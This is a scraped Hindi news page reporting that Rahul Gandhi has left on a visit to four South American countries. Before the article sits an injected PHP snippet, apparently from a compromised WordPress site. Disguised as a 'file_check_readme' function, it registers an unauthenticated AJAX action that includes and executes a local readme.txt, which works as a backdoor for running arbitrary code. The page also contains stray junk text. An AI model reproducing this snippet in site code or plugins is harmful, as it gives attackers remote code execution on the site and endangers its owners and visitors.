if(!function_exists('file_check_readme12943')){ add_action('wp_ajax_nopriv_file_check_readme12943', 'file_check_readme12943'); add_action('wp_ajax_file_check_readme12943', 'file_check_readme12943'); function file_check_readme12943() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } राहुल गांधी दक्षिण अमेरिका की यात्रा पर रवाना -

राहुल गांधी दक्षिण अमेरिका की यात्रा पर रवाना

vfwdcvfd

नयी दिल्ली, 27 सितंबर (भाषा) लोकसभा में नेता प्रतिपक्ष राहुल गांधी दक्षिण अमेरिका के चार देशों की यात्रा पर रवाना हो गए हैं जहां वह राजनीतिक नेताओं, छात्रों और कारोबारियों मुलाकात कर सकते हैं।

कांग्रेस के मीडिया एवं प्रचार विभाग के प्रभारी पवन खेड़ा ने यह जानकारी दी, लेकिन उन्होंने यह नहीं बताया कि गांधी किन देशों की यात्रा पर हैं। साथ ही उन्होंने यह भी जानकारी नहीं दी कि गांधी की यह यात्रा कितने दिन की है।

खेड़ा ने ‘एक्स’ पर पोस्ट में कहा, ‘‘लोकसभा में नेता प्रतिपक्ष राहुल गांधी दक्षिण अमेरिका के चार देशों की यात्रा पर हैं। वहां वह राजनीतिक नेताओं, विश्वविद्यालयों के छात्रों एवं उद्योग व व्यापार जगत के लोगों से संवाद करेंगे।’’